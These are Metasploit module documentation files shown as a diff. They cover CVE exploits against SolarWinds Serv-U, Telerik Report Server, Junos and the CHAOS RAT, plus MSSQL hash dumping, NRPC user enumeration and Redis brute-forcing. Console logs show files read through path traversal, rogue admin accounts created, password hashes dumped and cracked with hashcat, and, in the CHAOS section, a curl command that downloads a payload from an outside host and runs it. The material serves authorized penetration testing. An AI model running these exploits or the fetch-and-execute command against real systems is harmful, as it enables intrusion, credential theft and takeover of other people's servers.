+Whether the read file's contents should be stored as loot in the Metasploit database. If set to false, the files
+content will be displayed in the console. (default: true).
+
+### TARGETURI
+The base URI path to the web application (default: /).
+
+### TARGETFILE
+The absolute path of a target file to read (default: /etc/passwd).
+
+### PATH_TRAVERSAL_COUNT
+The number of double dot (..) path segments needed to traverse to the root folder. For a default install of Serv-U
+on both Linux and Windows, the value for this is 4. (default: 4).
+
+## Scenarios
+
+### A vulnerable Linux target
+
+```
+msf6 auxiliary(gather/solarwinds_servu_fileread_cve_2024_28995) > set RHOST 192.168.86.43
+RHOST => 192.168.86.43
+msf6 auxiliary(gather/solarwinds_servu_fileread_cve_2024_28995) > set RPORT 443
+RPORT => 443
+msf6 auxiliary(gather/solarwinds_servu_fileread_cve_2024_28995) > set SSL true
+[!] Changing the SSL option's value may require changing RPORT!
+SSL => true
+msf6 auxiliary(gather/solarwinds_servu_fileread_cve_2024_28995) > set STORE_LOOT false
+STORE_LOOT => false
+msf6 auxiliary(gather/solarwinds_servu_fileread_cve_2024_28995) > set TARGETFILE /etc/passwd
+TARGETFILE => /etc/passwd
+msf6 auxiliary(gather/solarwinds_servu_fileread_cve_2024_28995) > show options
+
+Module options (auxiliary/gather/solarwinds_servu_fileread_cve_2024_28995):
+
+   Name                  Current Setting  Required  Description
+   ----                  ---------------  --------  -----------
+   PATH_TRAVERSAL_COUNT  4                yes       The number of double dot (..) path segments needed to traverse to the root folder.
+   Proxies                                no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                192.168.86.43    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT                 443              yes       The target port (TCP)
+   SSL                   true             no        Negotiate SSL/TLS for outgoing connections
+   STORE_LOOT            false            no        Store the target file as loot
+   TARGETFILE            /etc/passwd      yes       The full path of a target file to read.
+   TARGETURI             /                yes       The base URI path to the web application
+   VHOST                                  no        HTTP server virtual host
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(gather/solarwinds_servu_fileread_cve_2024_28995) > check
+[+] 192.168.86.43:443 - The target is vulnerable. SolarWinds Serv-U version 15.4.2.126 (Linux 64-bit; Version: 6.5.0-15-generic)
+msf6 auxiliary(gather/solarwinds_servu_fileread_cve_2024_28995) > run
+[*] Running module against 192.168.86.43
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. SolarWinds Serv-U version 15.4.2.126 (Linux 64-bit; Version: 6.5.0-15-generic)
+[*] Reading file /etc/passwd
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
+systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
+messagebus:x:102:105::/nonexistent:/usr/sbin/nologin
+systemd-timesync:x:103:106:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
+syslog:x:104:111::/home/syslog:/usr/sbin/nologin
+_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
+tss:x:106:112:TPM software stack,,,:/var/lib/tpm:/bin/false
+uuidd:x:107:115::/run/uuidd:/usr/sbin/nologin
+systemd-oom:x:108:116:systemd Userspace OOM Killer,,,:/run/systemd:/usr/sbin/nologin
+tcpdump:x:109:117::/nonexistent:/usr/sbin/nologin
+avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
+usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
+dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
+kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
+avahi:x:114:121:Avahi mDNS daemon,,,:/run/avahi-daemon:/usr/sbin/nologin
+cups-pk-helper:x:115:122:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
+rtkit:x:116:123:RealtimeKit,,,:/proc:/usr/sbin/nologin
+whoopsie:x:117:124::/nonexistent:/bin/false
+sssd:x:118:125:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
+speech-dispatcher:x:119:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
+nm-openvpn:x:120:126:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
+saned:x:121:128::/var/lib/saned:/usr/sbin/nologin
+colord:x:122:129:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
+geoclue:x:123:130::/var/lib/geoclue:/usr/sbin/nologin
+pulse:x:124:131:PulseAudio daemon,,,:/run/pulse:/usr/sbin/nologin
+gnome-initial-setup:x:125:65534::/run/gnome-initial-setup/:/bin/false
+hplip:x:126:7:HPLIP system user,,,:/run/hplip:/bin/false
+gdm:x:127:133:Gnome Display Manager:/var/lib/gdm3:/bin/false
+mysql:x:128:136:MySQL Server,,,:/nonexistent:/bin/false
+fwupd-refresh:x:129:137:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
+xrdp:x:130:138::/run/xrdp:/usr/sbin/nologin
+
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/solarwinds_servu_fileread_cve_2024_28995) > 
+```
+
+### A vulnerable Windows target
+
+```
+msf6 auxiliary(gather/solarwinds_servu_fileread_cve_2024_28995) > set RHOST 192.168.86.68
+RHOST => 192.168.86.68
+msf6 auxiliary(gather/solarwinds_servu_fileread_cve_2024_28995) > set RPORT 80
+RPORT => 80
+msf6 auxiliary(gather/solarwinds_servu_fileread_cve_2024_28995) > set SSL false
+[!] Changing the SSL option's value may require changing RPORT!
+SSL => false
+msf6 auxiliary(gather/solarwinds_servu_fileread_cve_2024_28995) > set TARGETFILE c:\\\\Windows\\win.ini
+TARGETFILE => c:\\Windows\win.ini
+msf6 auxiliary(gather/solarwinds_servu_fileread_cve_2024_28995) > show options 
+
+Module options (auxiliary/gather/solarwinds_servu_fileread_cve_2024_28995):
+
+   Name                  Current Setting      Required  Description
+   ----                  ---------------      --------  -----------
+   PATH_TRAVERSAL_COUNT  4                    yes       The number of double dot (..) path segments needed to traverse to the root folder.
+   Proxies                                    no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                192.168.86.68        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT                 80                   yes       The target port (TCP)
+   SSL                   false                no        Negotiate SSL/TLS for outgoing connections
+   STORE_LOOT            false                no        Store the target file as loot
+   TARGETFILE            c:\\Windows\win.ini  yes       The full path of a target file to read.
+   TARGETURI             /                    yes       The base URI path to the web application
+   VHOST                                      no        HTTP server virtual host
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(gather/solarwinds_servu_fileread_cve_2024_28995) > check
+[+] 192.168.86.68:80 - The target is vulnerable. SolarWinds Serv-U version 15.4.2.126 (Windows Server 2012 64-bit; Version: 6.2.9200)
+msf6 auxiliary(gather/solarwinds_servu_fileread_cve_2024_28995) > run
+[*] Running module against 192.168.86.68
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. SolarWinds Serv-U version 15.4.2.126 (Windows Server 2012 64-bit; Version: 6.2.9200)
+[*] Reading file c:\\Windows\win.ini
+; for 16-bit app support
+[fonts]
+[extensions]
+[mci extensions]
+[files]
+[Mail]
+MAPI=1
+
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/solarwinds_servu_fileread_cve_2024_28995) >
+```

documentation/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.md

@@ -39,14 +39,15 @@ If you already have the LDAP base DN, you may set it in this option.
 msf5 > use auxiliary/gather/vmware_vcenter_vmdir_ldap
 msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) > options
 
-Module options (auxiliary/gather/vmware_vcenter_vmdir_ldap):
-
-   Name     Current Setting  Required  Description
-   ----     ---------------  --------  -----------
-   BASE_DN                   no        LDAP base DN if you already have it
-   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
-   RPORT    636              yes       The target port
-   SSL      true             no        Enable SSL on the LDAP connection
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   BASE_DN                    no        LDAP base DN if you already have it
+   DOMAIN                     no        The domain to authenticate to
+   PASSWORD                   no        The password to authenticate with
+   RHOSTS                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT     636              yes       The target port
+   SSL       true             no        Enable SSL on the LDAP connection
+   USERNAME                   no        The username to authenticate with
 
 
 Auxiliary action:

documentation/modules/auxiliary/gather/windows_secrets_dump.md

@@ -2,10 +2,15 @@
 ### Description
 The `windows_secrets_dump` auxiliary module dumps SAM hashes and LSA secrets
 (including cached creds) from the remote Windows target without executing any
-agent locally. First, it reads as much data as possible from the registry and
-then save the hives locally on the target (`%SYSTEMROOT%\\random.tmp`).
-Finally, it downloads the temporary hive files and reads the rest of the data
-from it. These temporary files are removed when it's done.
+agent locally. This is done by remotely updating the registry key security
+descriptor, taking advantage of the WriteDACL privileges held by local
+administrators to set temporary read permissions.
+
+This can be disabled by setting the `INLINE` option to false and the module
+will fallback to the original implementation, which consists in saving the
+registry hives locally on the target (%SYSTEMROOT%\Temp\<random>.tmp),
+downloading the temporary hive files and reading the data from it. This
+temporary files are removed when it's done.
 
 On domain controllers, secrets from Active Directory is extracted using [MS-DRDS]
 DRSGetNCChanges(), replicating the attributes we need to get SIDs, NTLM hashes,
@@ -43,7 +48,10 @@ Windows XP/Server 2003 to Windows 10/Server version 2004.
 14. Verify the notes are there
 
 ## Options
-Apart from the standard SMB options, no other specific options are needed.
+
+### INLINE
+Use inline technique to read protected keys from the registry remotely without
+saving the hives to disk (default: true).
 
 ## Actions
 

documentation/modules/auxiliary/scanner/dcerpc/nrpc_enumusers.md

@@ -0,0 +1,79 @@
+## Vulnerable Application
+
+A new method for gathering domain users. The method leverages auth-level = 1 (No authentication) against the
+MS-NRPC (Netlogon) interface on domain controllers. All that's required is the domain controller's IP address,
+and the entire process can be completed without providing any credentials.
+
+## Verification Steps
+
+1. Do: `use auxiliary/gather/nrpc_enumusers`
+2. Do: `set RHOSTS <targer IP addresses>`
+3. Do: `set USER_FILE <path to your users list>`
+4. Do: `run`
+
+
+## Target
+
+To use nrpc_enumusers, make sure you are able to connect to the Domain Controller.
+It has been tested with Windows servers 2012, 2016, 2019 and 2022
+
+## Options
+
+### USER_FILE
+
+**Description:** Path to the file containing the list of usernames to enumerate. Each username should be on a separate line.
+
+**Usage:** Provide the path to the file that contains the list of user accounts you want to test.
+
+**Example:** `set USER_FILE /path/to/usernames.txt`
+
+2- `RHOSTS` (required)
+
+**Description:** The target IP address or range of IP addresses of the Domain Controllers.
+
+**Usage:** Specify the IP address or addresses of the Domain Controllers you are targeting.
+
+**Example:** `set RHOSTS 192.168.1.100`
+
+3- `RPORT` (optional)
+
+**Description:** The port for the MS-NRPC interface. If not specified, the module will attempt to determine the endpoint.
+
+**Usage:** If you know the port used by the MS-NRPC interface, you can specify it. Otherwise, the module will find it automatically.
+
+**Example:** `set RPORT 49664`
+
+## Scenarios
+
+The following demonstrates basic usage, using a custom wordlist,
+targeting a single Domain Controller to identify valid domain user accounts.
+
+Create a new `./users.txt` file, then run the module:
+
+```
+msf6 auxiliary(gather/nrpc_enumusers) > set RHOSTS 192.168.177.177
+RHOSTS => 192.168.177.177
+msf6 auxiliary(gather/nrpc_enumusers) > set USER_FILE users.txt 
+USER_FILE => users.txt
+msf6 auxiliary(gather/nrpc_enumusers) > run
+
+[*] 192.168.177.177: - Connecting to the endpoint mapper service...
+[*] 192.168.177.177: - Binding to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:192.168.177.177[49664]...
+[-] 192.168.177.177: - Tiffany.Molina does not exist
+[-] 192.168.177.177: - SMITH does not exist
+[-] 192.168.177.177: - JOHNSON does not exist
+[-] 192.168.177.177: - WILLIAMS does not exist
+[-] 192.168.177.177: - Administratorsvc_ldap does not exist
+[-] 192.168.177.177: - svc_ldap does not exist
+[-] 192.168.177.177: - ksimpson does not exist
+[+] 192.168.177.177: - Administrator exists
+[-] 192.168.177.177: - James does not exist
+[-] 192.168.177.177: - nikk37 does not exist
+[-] 192.168.177.177: - svc-printer does not exist
+[-] 192.168.177.177: - SABatchJobs does not exist
+[-] 192.168.177.177: - e.black does not exist
+[-] 192.168.177.177: - Kaorz does not exist
+[*] 192.168.177.177: - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/nrpc_enumusers) >
+```

documentation/modules/auxiliary/scanner/http/telerik_report_server_auth_bypass.md

@@ -0,0 +1,53 @@
+## Vulnerable Application
+This module exploits an authentication bypass vulnerability in Telerik Report Server versions 10.0.24.305 and
+prior which allows an unauthenticated attacker to create a new account with administrative privileges. The
+vulnerability leverages the initial setup page which is still accessible once the setup process has completed.
+
+If either USERNAME or PASSWORD are not specified, then a random value will be selected. The module will fail if
+the specified USERNAME already exists.
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use auxiliary/scanner/http/telerik_report_server_auth_bypass`
+1. Set the `RHOSTS` option
+1. Do: `run`
+
+## Options
+
+### USERNAME
+Username for the new account. A random value will be used unless specified.
+
+### PASSWORD
+Password for the new account. A random value will be used unless specified.
+
+## Scenarios
+
+### Telerik Report Server 8.0.22.225 on Windows Server 2022
+
+```
+metasploit-framework (S:0 J:0) auxiliary(scanner/http/telerik_report_server_auth_bypass) > set RHOSTS 192.168.159.27
+RHOSTS => 192.168.159.27
+metasploit-framework (S:0 J:0) auxiliary(scanner/http/telerik_report_server_auth_bypass) > set VERBOSE true
+VERBOSE => true
+metasploit-framework (S:0 J:0) auxiliary(scanner/http/telerik_report_server_auth_bypass) > check
+
+[*] Detected Telerik Report Server version: 8.0.22.225.
+[+] 192.168.159.27:83 - The target is vulnerable. Telerik Report Server 8.0.22.225 is affected.
+metasploit-framework (S:0 J:0) auxiliary(scanner/http/telerik_report_server_auth_bypass) > run
+[*] Running module against 192.168.159.27
+
+[*] Creating a new administrator account using CVE-2024-4358
+[+] Created account: newton_schmeler:CkiaTtppD4eGUvl7
+[*] Auxiliary module execution completed
+metasploit-framework (S:0 J:0) auxiliary(scanner/http/telerik_report_server_auth_bypass) > creds
+Credentials
+===========
+
+host            origin          service        public                private           realm  private_type  JtR Format  cracked_password
+----            ------          -------        ------                -------           -----  ------------  ----------  ----------------
+192.168.159.27  192.168.159.27  83/tcp (http)  newton_schmeler       CkiaTtppD4eGUvl7         Password
+
+metasploit-framework (S:0 J:0) auxiliary(scanner/http/telerik_report_server_auth_bypass) >
+```

documentation/modules/auxiliary/scanner/mssql/mssql_hashdump.md

@@ -0,0 +1,91 @@
+## Description
+
+The `mssql_hashdump` module queries an MSSQL instance or session and returns hashed user:pass pairs. These pairs can be decripted via or `hashcat`.
+
+## Available Options
+
+```
+msf6 auxiliary(scanner/mssql/mssql_hashdump) > options
+
+Module options (auxiliary/scanner/mssql/mssql_hashdump):
+
+   Name                 Current Setting  Required  Description
+   ----                 ---------------  --------  -----------
+   USE_WINDOWS_AUTHENT  false            yes       Use windows authentication (requires DOMAIN option set)
+
+
+   Used when making a new connection via RHOSTS:
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   DATABASE  MSSQL            no        The database to authenticate against
+   PASSWORD                   no        The password for the specified username
+   RHOSTS                     no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT     1433             no        The target port (TCP)
+   THREADS   1                yes       The number of concurrent threads (max one per host)
+   USERNAME  MSSQL            no        The username to authenticate as
+
+
+   Used when connecting via an existing SESSION:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SESSION                   no        The session to run this module on
+```
+
+## Scenarios
+
+With a session:
+```
+msf6 auxiliary(scanner/mssql/mssql_hashdump) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type   Information                Connection
+  --  ----  ----   -----------                ----------
+  1         mssql  MSSQL sa @ 127.0.0.1:1433  127.0.0.1:52307 -> 127.0.0.1:1433 (127.0.0.1)
+
+msf6 auxiliary(scanner/mssql/mssql_hashdump) > run session=-1
+
+[*] Using existing session 1
+[*] Instance Name: "758549b9f69e"
+[+] Saving mssql12 = sa:0x0200F433830BDBA809805FE53E59E7A1AACF9AC21241881F76B9B95EDC713FD01C8E692705409A5C0F8A46DDB1707A283BA9307D6B3C664BB9F7652758B70262C88F629DBC7E
+[+] Saving mssql12 = ##MS_PolicyEventProcessingLogin##:0x02003F137BFF990AE7D0B89DA15EEDF4B962E200A9AAECE6AC7E4786176A08C4D278C0E9B203795F972CB508FD17827A755AF4284A9891F01C502EEBB5ECFABD7FA6CD3603E2
+[+] Saving mssql12 = ##MS_PolicyTsqlExecutionLogin##:0x0200DA9B84641F740A6423EC34F1B354FB81D9DF53456A7A7A8CCB794B295896C0CD19718C2C9537D3A7E82C41350F1549E2E2B99D819345DCABF1855AF2F83FA6CDC3EF8F96
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/mssql/mssql_hashdump) > run RPORT=1433 RHOSTS=127.0.0.1 USERNAME=sa PASSWORD=yourStrong(!)Password
+
+[*] 127.0.0.1:1433 - Instance Name: "758549b9f69e"
+[+] 127.0.0.1:1433 - Saving mssql12 = sa:0x0200F433830BDBA809805FE53E59E7A1AACF9AC21241881F76B9B95EDC713FD01C8E692705409A5C0F8A46DDB1707A283BA9307D6B3C664BB9F7652758B70262C88F629DBC7E
+[+] 127.0.0.1:1433 - Saving mssql12 = ##MS_PolicyEventProcessingLogin##:0x02003F137BFF990AE7D0B89DA15EEDF4B962E200A9AAECE6AC7E4786176A08C4D278C0E9B203795F972CB508FD17827A755AF4284A9891F01C502EEBB5ECFABD7FA6CD3603E2
+[+] 127.0.0.1:1433 - Saving mssql12 = ##MS_PolicyTsqlExecutionLogin##:0x0200DA9B84641F740A6423EC34F1B354FB81D9DF53456A7A7A8CCB794B295896C0CD19718C2C9537D3A7E82C41350F1549E2E2B99D819345DCABF1855AF2F83FA6CDC3EF8F96
+[*] 127.0.0.1:1433 - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+Directly querying a machine:
+```
+msf6 auxiliary(scanner/mssql/mssql_hashdump) > run RPORT=1433 RHOSTS=127.0.0.1 USERNAME=sa PASSWORD=yourStrong(!)Password
+
+[*] 127.0.0.1:1433 - Instance Name: "758549b9f69e"
+[+] 127.0.0.1:1433 - Saving mssql12 = sa:0x0200F433830BDBA809805FE53E59E7A1AACF9AC21241881F76B9B95EDC713FD01C8E692705409A5C0F8A46DDB1707A283BA9307D6B3C664BB9F7652758B70262C88F629DBC7E
+[+] 127.0.0.1:1433 - Saving mssql12 = ##MS_PolicyEventProcessingLogin##:0x02003F137BFF990AE7D0B89DA15EEDF4B962E200A9AAECE6AC7E4786176A08C4D278C0E9B203795F972CB508FD17827A755AF4284A9891F01C502EEBB5ECFABD7FA6CD3603E2
+[+] 127.0.0.1:1433 - Saving mssql12 = ##MS_PolicyTsqlExecutionLogin##:0x0200DA9B84641F740A6423EC34F1B354FB81D9DF53456A7A7A8CCB794B295896C0CD19718C2C9537D3A7E82C41350F1549E2E2B99D819345DCABF1855AF2F83FA6CDC3EF8F96
+[*] 127.0.0.1:1433 - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+Different MSSQL Versions have different hash formats. For example:
+
+MSSQL (2000): 0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578
+MSSQL (2005): 0x010018102152f8f28c8499d8ef263c53f8be369d799f931b2fbe
+MSSQL (2012 and later): 0x02000102030434ea1b17802fd95ea6316bd61d2c94622ca3812793e8fb1672487b5c904a45a31b2ab4a78890d563d2fcf5663e46fe797d71550494be50cf4915d3f4d55ec375
+
+To decrypt:
+Save into a `passwords.txt` file
+Run with hashcat, based on the MSSQL Version:
+`hashcat --force -m 131 ./hashes.txt ./passwords.txt` (MSSQL 2000)
+`hashcat --force -m 132 ./hashes.txt ./passwords.txt` (MSSQL 2005)
+`hashcat --force -m 1731 ./hashes.txt ./passwords.txt` (MSSQL 2012 and later)

documentation/modules/auxiliary/scanner/redis/redis_login.md

@@ -4,10 +4,49 @@ database with optional durability. Redis supports different kinds of abstract da
 such as strings, lists, maps, sets, sorted sets, HyperLogLogs, bitmaps, streams, and spatial indexes.
 
 This module is login utility to find the password of the Redis server by bruteforcing the login portal.
-Note that Redis does not require a username to log in; login is done purely via supplying a valid password.
 
 A complete installation guide for Redis can be found [here](https://redis.io/topics/quickstart)
 
+### Redis Authentication
+
+Redis has several ways to support secure connections to the in-memory database:
+
+* Prior to Redis 6, the `requirepass` directive could be set, setting a master password for all connections.
+  This requires the usage of the `AUTH <password>` command before executing any commands on the cluster.
+* After Redis 6, the `requirepass` directive sets a password for the default user `default`
+  * The `AUTH` command now takes two arguments instead of one: `AUTH <username> <password>`
+  * The `AUTH` command still accepts a single arguments, but defaults to the user `default`
+
+## Setup
+
+Run redis in docker without auth:
+
+```
+docker run --rm -p 6379:6379 redis
+```
+
+Optionally setting the default password for the implicit `default` username account, connect to the running Redis instance and set a password:
+
+```
+$ nc 127.0.0.1 6379
+config set requirepass mypass
++OK
+```
+
+Optionally creating an enabled `test_user` user account with password `mypass` - if ACL is supported (Redis >= 6.0.0):
+
+```
+$ nc 127.0.0.1 6379
+ACL SETUSER test_user allkeys on +@string +@set -SADD >mypass
+```
+
+Optionally creating a disabled `test_user_disabled` user account with password `mypass` - if ACL is supported (Redis >= 6.0.0):
+
+```
+$ nc 127.0.0.1 6379
+ACL SETUSER test_user_disabled allkeys off +@string +@set -SADD >mypass
+```
+
 ## Verification Steps
 1. Do: `use auxiliary/scanner/redis/redis_login`
 2. Do: `set RHOSTS [ips]`

documentation/modules/exploit/freebsd/http/junos_phprc_auto_prepend_file.md

@@ -36,11 +36,11 @@ function is `allow_url_include` which allows the use of URL-aware `fopen` wrappe
 `allow_url_include`, the exploit can use any protocol wrapper with `auto_prepend_file`. The module then uses
 `data://` to provide a file inline which includes the base64 encoded PHP payload.
 
-By default this exploit returns a session confined to a FreeBSD jail with limited functionality. There is a
-datastore option `JAIL_BREAK`, that when set to true, will steal the necessary tokens from a user authenticated
-to the J-Web application, in order to overwrite the root password hash. If there is no user authenticated
-to the J-Web application this method will not work. The module then authenticates with the new root password over
-SSH and then rewrites the original root password hash to /etc/master.passwd.
+By default this exploit returns a session confined to a FreeBSD jail with limited functionality when using the
+`PHP In-Memory target`. When using the `Interactive SSH with jail break` target the module will steal the necessary
+tokens from a user authenticated to the J-Web application, in order to overwrite the root password hash. If there is no
+user authenticated to the J-Web application the module will create one. The module then authenticates with the new root
+password over SSH and then rewrites the original root password hash to /etc/master.passwd.
 
 ### Setup
 
@@ -144,7 +144,7 @@ Meterpreter : php/freebsd
 meterpreter > exit
 ```
 
-### Interactive SSH with jail break junos-vsrx3-x86-64-20.2R1.10.scsi.ova 
+### Interactive SSH with jail break junos-vsrx3-x86-64-20.2R1.10.scsi.ova
 ```
 msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > show targets
 
@@ -233,4 +233,4 @@ bind:*:53:53::0:0:Bind Sandbox:/:/sbin/nologin
 uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/sbin/nologin
 nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/sbin/nologin
 admin:$6$Dj.crXwf$EyAmqaJz7f3.JldkbZk7eZuApofQ7zK/z/7Q5ntrD3cebxYc9/Y2FSoJcUIZSgYwKGGyd0nnfNSvaHzkz6BLL1:2000:20:j-super-user:0:0:Administrator:/var/home/admin:/usr/sbin/cli
-```
+```

documentation/modules/exploit/linux/http/chaos_rat_xss_to_rce.md

@@ -0,0 +1,267 @@
+## Vulnerable Application
+
+CHAOS v5.0.8 is a free and open-source Remote Administration Tool that
+allows generated binaries to control remote operating systems. The
+webapp contains a remote command execution vulnerability which
+can be triggered by an authenticated user when generating a new
+executable. The webapp also contains an XSS vulnerability within
+the view of a returned command being executed on an agent.
+
+Execution can happen through one of three routes:
+
+1. Provided credentials can be used to execute the RCE directly
+2. A `JWT` token from an agent can be provided to emulate a compromised
+host. If a logged in user attempts to execute a command on the host
+the returned value contains an xss payload.
+3. Similar to technique 2, an agent executable can be provided and the
+`JWT` token can be extracted.
+
+Verified against CHAOS `7d5b20ad7e58e5b525abdcb3a12514b88e87cef2` running
+in a docker container.
+
+### Install
+
+Docker image: `docker run -it -v ~/chaos-container:/database/ -v ~/chaos-container:/temp/ -e PORT=8080 -e SQLITE_DATABASE=chaos -p 8080:8080 tiagorlampert/chaos:latest`
+
+To generate an agent, login (`admin`:`admin`). Click the triple lines
+to expand the menu, select `Manage`, `Generate Client`. Click `Build`.
+
+## Verification Steps
+
+1. Install the application or run the docker image
+1. Start msfconsole
+1. Do: `use exploit/linux/http/chaos_rat_xss_to_rce`
+1. Do: `set rhost [ip]`
+1. Pick a method:
+  1. `set username [username]`, `set password [password]`
+  2. `set jwt [jwt token]`
+  3. `set agent [path to agent]`
+1. Do: `run`
+1. You should get a shell. Interaction by a CHAOS admin may be required
+
+## Options
+
+### USERNAME
+
+User to login with, default for CHAOS is `admin`.
+
+### PASSWORD
+
+Password to login with, default for CHAOS is `admin`.
+
+### JWT
+
+JWT token from an agent. Used to emulate a compromised
+host.
+
+### AGENT
+
+The path to an agent executable generated by CHAOS. Used to emulate a compromised host.
+
+## Advanced Options
+
+### AGENT_HOSTNAME
+
+Hostname for a fake agent. Defaults to `DC01`.
+
+### AGENT_USERNAME
+
+Username for a fake agent. Defaults to `Administrator`.
+
+### AGENT_USERID
+
+User ID for a fake agent. Defaults to `Administrator`.
+
+### AGENT_OS
+
+OS for a fake agent. Choices are `Windows`, or `Linux`.
+Defaults to `Windows`.
+
+## Scenarios
+
+### Docker Image
+
+#### Agent Method
+
+```
+[*] Processing chaos.rb for ERB directives.
+resource (chaos.rb)> use exploit/linux/http/chaos_rat_xss_to_rce
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (chaos.rb)> set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+resource (chaos.rb)> set FETCH_SRVPORT 9090
+FETCH_SRVPORT => 9090
+resource (chaos.rb)> set agent malware2.exe
+agent => malware2.exe
+resource (chaos.rb)> set SRVHOST 111.111.10.147
+SRVHOST => 111.111.10.147
+resource (chaos.rb)> set SRVPORT 8888
+SRVPORT => 8888
+resource (chaos.rb)> set verbose true
+verbose => true
+msf6 exploit(linux/http/chaos_rat_xss_to_rce) > exploit
+
+[*] Command to run on remote host: curl -so ./SPSVaaJxd http://111.111.10.147:9090/mh1dne7HFFTZ0wiiiWgmfw; chmod +x ./SPSVaaJxd; ./SPSVaaJxd &
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+msf6 exploit(linux/http/chaos_rat_xss_to_rce) >
+[*] Fetch handler listening on 111.111.10.147:9090
+[*] HTTP server started
+[*] Adding resource /mh1dne7HFFTZ0wiiiWgmfw
+[*] Started reverse TCP handler on 111.111.10.147:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. Chaos application found
+[*] Attempting exploitation through Agent
+[*] Server address: 172.17.0.2
+[*] Server port: 8080
+[*] Server JWT Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3NDQ4MDY5MzgsInVzZXIiOiJkZWZhdWx0In0.3zlOZ8RI_YdDqEgNbt20oL7R30Ry5JgwJVCEqx0WSUA
+[*] Fake MAC for agent: f8:16:5a:23:5b:74
+[*] Listening for XSS response on: http://111.111.10.147:8888/
+[*] Performing Callback Checkin
+[*] WebSocket connecting to receive commands
+[*] Performing Callback Checkin
+```
+
+Log in to the website, click `Acion`, `Remote Shell` on the
+fake agent we've added to the list. Now type anything into
+the input box and click `Send`.
+
+```
+[+] Received agent command 'id', sending XSS in return
+[*] Received GET request.
+[+] Received cookie: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MTMzNzA0ODksIm9yaWdfaWF0IjoxNzEzMzY2ODg5LCJ1c2VyIjoiYWRtaW4ifQ.qGbOOAc8RG6Hsd2SJKzGVAczJJ7KwEI2MxdIojM06d4
+[+] Detected Agents
+Live Agents
+===========
+
+ IP         OS       Username    Hostname  MAC
